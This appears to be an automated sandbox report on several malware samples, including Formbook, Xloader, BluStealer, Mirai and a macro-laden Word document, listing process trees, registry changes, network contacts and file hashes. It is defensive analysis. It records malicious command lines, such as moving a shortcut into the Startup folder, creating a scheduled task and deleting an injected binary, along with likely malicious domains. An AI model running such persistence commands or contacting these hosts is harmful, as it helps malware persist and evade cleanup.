Reads user/profile data of web browsers
Browser Information Discovery
Processes
C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe
"C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe"
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| File created | C:\Windows\Tasks\openvpn-gui.job | C:\Windows\SysWOW64\mstsc.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mstsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\632cfc71bd4734fdd98e48166a52fbc4a48d43640f3375fd882dd374479bffb1.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\system32\mstsc.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "move /y "C:\Users\Admin\AppData\Local\Temp\openvpn-gui.lnk" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\openvpn-gui.lnk""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.157:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| IE | 2.19.61.135:80 | www.microsoft.com | tcp |
Files
memory/2644-0-0x000000002FF71000-0x000000002FF72000-memory.dmp
memory/2644-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2644-2-0x000000007164D000-0x0000000071658000-memory.dmp
memory/2644-36-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-35-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-34-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-33-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-42-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-41-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-44-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-45-0x00000000070D0000-0x00000000071D0000-memory.dmp
\Users\Admin\AppData\Local\Temp\churner.dll
| MD5 | f7092de5f32c0df837fa7f947a3424af |
| SHA1 | acc8123288c20b1c4ae67ef4f2b4028d9153239c |
| SHA256 | 97adb1700858b74f456f5cf681b0421d0be50e3aed1adea3d1b9694295723700 |
| SHA512 | f10d5c86a85d3d8be56fb5066fddd0474c71a36f280f475f4e3d6cc939718647f493665c4c9ea00c3d60f22f172019e2082c7090b54f730d02701f1cb3d34164 |
\Users\Admin\AppData\Local\Temp\churner.dll
| MD5 | 0546651845809bc22408fc50cb0d65d2 |
| SHA1 | 3d5ef77d628c56ecce8997f6ec0e8bb10c135d66 |
| SHA256 | 05d0eae0fe71eb89cbe6b752290004385d24511507dabd40e1e12fe2c271a06c |
| SHA512 | 86a63794dab6eacdb3b03569a9957c7ddd7c91269b7e75568857264a19c97617c33f09b2085e77308d3c4bfe1baa37f8793b0096a6ab5ba2442b51b00275bd6c |
memory/2644-51-0x00000000025E0000-0x00000000025E6000-memory.dmp
memory/2808-52-0x0000000000090000-0x0000000000093000-memory.dmp
memory/2644-53-0x000000007164D000-0x0000000071658000-memory.dmp
memory/2644-54-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-55-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-57-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-58-0x00000000070D0000-0x00000000071D0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/2644-75-0x00000000070D0000-0x00000000071D0000-memory.dmp
\Users\Admin\AppData\Local\openvpn-gui.exe
| MD5 | 87390e37e36622b054d4bdcbb7997b6c |
| SHA1 | 4d591f310318fd95a95109d7965a79729b65c69e |
| SHA256 | 5f067f86ad0f88a629263162810bf5052f5ebbd97d5d0de936311bb44c9f35e7 |
| SHA512 | 285abb19138a5dd109dfc0e76f4a4f96b3731a84ca9229e6ef9315513b052fd7ad7b2e0392ac9becbf4caf2c9bbdbd87f5b66486fb2ae1385c1fbe6e1ed643dd |
C:\Users\Admin\AppData\Local\Temp\openvpn-gui.lnk
| MD5 | a6716a28c760eafd1f2ba7279a351da6 |
| SHA1 | 317f388247ffced79d643e4f0d7ea90165b7ac1f |
| SHA256 | 09a5e5fa1c0d760dda86fadf0febfad69fc512b9f4b102c000f1470d9d98fece |
| SHA512 | a62a8bae1046a4e049cef426d98a24a395f571a837bc36022147e7f776ccefa3a7ff8bee2d49133abd0acfa1fa37436223763e1a0a1fba7bc97a47a3665891d4 |
memory/2644-87-0x00000000070D0000-0x00000000071D0000-memory.dmp
memory/2644-88-0x00000000025E0000-0x00000000025E6000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:45
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
136s
Command Line
Signatures
Formbook
Formbook family
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2976 set thread context of 4544 | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 4544 set thread context of 3428 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2960 set thread context of 3428 | N/A | C:\Windows\SysWOW64\msdt.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msdt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msdt.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msdt.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msdt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tUlSEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmp655C.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\msdt.exe
"C:\Windows\SysWOW64\msdt.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.myfabulouscollection.com | udp |
| US | 8.8.8.8:53 | www.xn--fhqrm54yyukopc.com | udp |
| US | 8.8.8.8:53 | www.thetrophyworld.com | udp |
| CA | 23.227.38.74:80 | www.thetrophyworld.com | tcp |
| US | 8.8.8.8:53 | 74.38.227.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/2976-0-0x0000000074A6E000-0x0000000074A6F000-memory.dmp
memory/2976-1-0x0000000000EE0000-0x0000000000FC6000-memory.dmp
memory/2976-2-0x0000000005F10000-0x00000000064B4000-memory.dmp
memory/2976-3-0x0000000005A00000-0x0000000005A92000-memory.dmp
memory/2976-4-0x0000000074A60000-0x0000000075210000-memory.dmp
memory/2976-5-0x00000000059D0000-0x00000000059DA000-memory.dmp
memory/2976-6-0x0000000005CD0000-0x0000000005D6C000-memory.dmp
memory/2976-7-0x0000000005CB0000-0x0000000005CD2000-memory.dmp
memory/2976-8-0x0000000074A6E000-0x0000000074A6F000-memory.dmp
memory/2976-9-0x0000000074A60000-0x0000000075210000-memory.dmp
memory/2976-10-0x0000000007310000-0x0000000007390000-memory.dmp
memory/2976-11-0x0000000007390000-0x00000000073C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp655C.tmp
| MD5 | 4e4c0d7031c9eb71183bf297759d876f |
| SHA1 | aedcadef910ffefc69a8e6b1b74492027d4091c8 |
| SHA256 | 2b50a815e1d178ce84706d81fde6a9522b4bb355b823426e80fcd401211fcc6a |
| SHA512 | f8f82a49506880a59aa18dd3e47906e5bbbfb9c38a86f2310b63ab4d2c9bfc4305a4ced9bdfc2ad97635bf9c99e4c31ae6610e628fb49043c8f8b0b2f85261ad |
memory/4544-17-0x0000000000400000-0x000000000042E000-memory.dmp
memory/2976-19-0x0000000074A60000-0x0000000075210000-memory.dmp
memory/4544-20-0x0000000000E50000-0x000000000119A000-memory.dmp
memory/4544-22-0x0000000000400000-0x000000000042E000-memory.dmp
memory/4544-23-0x0000000000D30000-0x0000000000D44000-memory.dmp
memory/3428-24-0x0000000003100000-0x0000000003276000-memory.dmp
memory/2960-25-0x0000000000EE0000-0x0000000000F37000-memory.dmp
memory/2960-26-0x0000000000EE0000-0x0000000000F37000-memory.dmp
memory/3428-27-0x0000000003100000-0x0000000003276000-memory.dmp
memory/3428-31-0x0000000008E30000-0x0000000008F72000-memory.dmp
memory/3428-32-0x0000000008E30000-0x0000000008F72000-memory.dmp
memory/3428-34-0x0000000008E30000-0x0000000008F72000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
debian9-mipsel-20240611-en
Max time kernel
0s
Command Line
Signatures
Mirai
Mirai family
Processes
/tmp/53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec
[/tmp/53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec]
Network
Files
memory/726-1-0x00400000-0x0045bf98-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
118s
Max time network
127s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
"C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe"
Network
Files
memory/764-0-0x0000000005290000-0x0000000005292000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
139s
Command Line
Signatures
BluStealer
Blustealer family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4192 set thread context of 3152 | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/4192-0-0x000000007481E000-0x000000007481F000-memory.dmp
memory/4192-2-0x0000000005380000-0x000000000541C000-memory.dmp
memory/4192-1-0x0000000000800000-0x000000000092A000-memory.dmp
memory/4192-3-0x00000000059D0000-0x0000000005F74000-memory.dmp
memory/4192-4-0x0000000005420000-0x00000000054B2000-memory.dmp
memory/4192-5-0x0000000005330000-0x000000000533A000-memory.dmp
memory/4192-7-0x0000000074810000-0x0000000074FC0000-memory.dmp
memory/4192-6-0x0000000005610000-0x0000000005666000-memory.dmp
memory/4192-8-0x0000000008200000-0x0000000008222000-memory.dmp
memory/4192-9-0x000000007481E000-0x000000007481F000-memory.dmp
memory/4192-10-0x0000000074810000-0x0000000074FC0000-memory.dmp
memory/4192-11-0x00000000087C0000-0x0000000008858000-memory.dmp
memory/4192-12-0x0000000008860000-0x00000000088B0000-memory.dmp
memory/3152-13-0x0000000000400000-0x0000000000448000-memory.dmp
memory/3152-16-0x0000000000400000-0x0000000000448000-memory.dmp
memory/4192-19-0x0000000074810000-0x0000000074FC0000-memory.dmp
memory/3152-20-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3224 set thread context of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 1932 set thread context of 3488 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 1932 set thread context of 3488 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 4936 set thread context of 3488 | N/A | C:\Windows\SysWOW64\cmmon32.exe | C:\Windows\Explorer.EXE |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
